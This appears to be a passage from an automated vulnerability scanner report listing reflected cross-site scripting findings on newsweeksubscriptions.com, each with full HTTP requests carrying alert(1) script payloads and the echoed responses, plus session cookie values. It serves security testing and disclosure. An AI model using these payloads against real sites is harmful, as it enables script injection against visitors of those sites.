The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4b2cc"><script>alert(1)</script>8dc6c819d52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/4b2cc"><script>alert(1)</script>8dc6c819d522/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:01 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53154


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="70/4b2cc"><script>alert(1)</script>8dc6c819d522/29">
...[SNIP]...

1.196. https://www.newsweeksubscriptions.com/4freetrial29/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e50a'%3balert(1)//2258684782 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e50a';alert(1)//2258684782 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=70/5e50a'%3balert(1)//22586847822/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:15:06 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=70/5e50a';alert(1)//22586847822/29';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=
...[SNIP]...

1.197. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12b7d"><script>alert(1)</script>ac719900224 was submitted in the off2on_code parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/2912b7d"><script>alert(1)</script>ac719900224 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:52 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_code" id="off2on_code" value="702/2912b7d"><script>alert(1)</script>ac719900224">
...[SNIP]...

1.198. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_code parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_code request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4954c'%3balert(1)//fcaff3a8f4a was submitted in the off2on_code parameter. This input was echoed as 4954c';alert(1)//fcaff3a8f4a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo&off2on_code=702/294954c'%3balert(1)//fcaff3a8f4a HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
   
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promo';


url += '&off2on_code=702/294954c';alert(1)//fcaff3a8f4a';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('1');
        guard_win=window.open(url, '_amslg_guard',"width=295,
...[SNIP]...

1.199. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 568f3"><script>alert(1)</script>baf6596ea92 was submitted in the off2on_login_url parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /4freetrial29/index.php?off2on_login_url=/promo568f3"><script>alert(1)</script>baf6596ea92&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:43 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53152


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
<input autocomplete="off" type="hidden" name="off2on_login_url" id="off2on_login_url" value="/promo568f3"><script>alert(1)</script>baf6596ea92">
...[SNIP]...

1.200. https://www.newsweeksubscriptions.com/4freetrial29/index.php [off2on_login_url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /4freetrial29/index.php

Issue detail

The value of the off2on_login_url request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d5d1c'%3balert(1)//7a28207e662 was submitted in the off2on_login_url parameter. This input was echoed as d5d1c';alert(1)//7a28207e662 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /4freetrial29/index.php?off2on_login_url=/promod5d1c'%3balert(1)//7a28207e662&off2on_code=702/29 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:47 GMT
Server: Apache/2.2.16 (Unix)
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Cache-Control: post-check=0, pre-check=0
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Length: 53122


<html>
<head>
<title>NewsweekSubscriptions.com - Subscribe to Newsweek Magazine</title>
<meta name="Keywords" content="Title:Newsweek, Newsweek Magazine, Newsweek Subscription, Newsweek Magazine Su
...[SNIP]...
ion()
{
   if (openguard_busy==1) { return; }
   openguard_busy=1;
       
   var url = "index.php?submitted=V&kind=guard&t=&extra_info=&extra_info2=";


url += '&off2on_login_url=/promod5d1c';alert(1)//7a28207e662';


url += '&off2on_code=702/29';


       if ((guard_win==null) && (document.cookie.indexOf('guard')==-1)) {
        //alert('
...[SNIP]...

1.201. https://www.newsweeksubscriptions.com/702FT [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /702FT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 68760<script>alert(1)</script>0202b58a743 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /702FT68760<script>alert(1)</script>0202b58a743 HTTP/1.1
Host: www.newsweeksubscriptions.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.newsweeksubscriptions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bcntnaa386q06i6k72ddc05vq5

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:36 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 517
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /702FT68760<script>alert(1)</script>0202b58a743 is not found !</p>
...[SNIP]...

1.202. https://www.newsweeksubscriptions.com/FTcontrol/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b151f<script>alert(1)</script>4ab5958d131 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /FTcontrolb151f<script>alert(1)</script>4ab5958d131/ HTTP/1.1
Referer: https://www.newsweeksubscriptions.com/FTcontrol/index.php
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:10:39 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 521
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolb151f<script>alert(1)</script>4ab5958d131 is not found !</p>
...[SNIP]...

1.203. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 3a498<script>alert(1)</script>553705f4106 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol3a498<script>alert(1)</script>553705f4106/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com is not found !</p>
...[SNIP]...

1.204. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9362f<script>alert(1)</script>b77e8849252 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:14:10 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker1c7b16f68f3d4364880fe7b87f27e95f.com9362f<script>alert(1)</script>b77e8849252 is not found !</p>
...[SNIP]...

1.205. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ab24<script>alert(1)</script>620cae9ac81 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:26 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 568
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol7ab24<script>alert(1)</script>620cae9ac81/Netsparker2cbd166ae342433790df4a67a21c6752.com is not found !</p>
...[SNIP]...

1.206. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 34af4<script>alert(1)</script>8e3cba28bfa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:11:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker2cbd166ae342433790df4a67a21c6752.com34af4<script>alert(1)</script>8e3cba28bfa is not found !</p>
...[SNIP]...

1.207. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ad7a3<script>alert(1)</script>f0d43520fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:48 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 567
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrolad7a3<script>alert(1)</script>f0d43520fa/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php is not found !</p>
...[SNIP]...

1.208. https://www.newsweeksubscriptions.com/FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.newsweeksubscriptions.com
Path:   /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 541de<script>alert(1)</script>0fa643ff5f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.newsweeksubscriptions.com
Cookie: PHPSESSID=bpkkjnjkva8d3s7p2qivj4u9i0; mb_sessid=146acee4942a9d16779cf90ffe6d17b0
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 04 Oct 2011 22:13:56 GMT
Server: Apache/2.2.16 (Unix)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 820
Keep-Alive: timeout=15, max=80
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8


<div style="padding-left:50px; padding-top:10px"><table border=0 cellpadding=5 cellspacing=0 width=770 style="border:1px solid #ccc"><tr height=25 bgcolor="#CB272C"><td align=left style="font-family
...[SNIP]...
<p style="font-family:arial;font-size:18px; color:#CB272C; font-weight:bold;"> Campaign url /FTcontrol/Netsparker3b11d2a9bea74309b717ec15a61a0c4d.php541de<script>alert(1)</script>0fa643ff5f4 is not found !</p>
...[SNIP]...

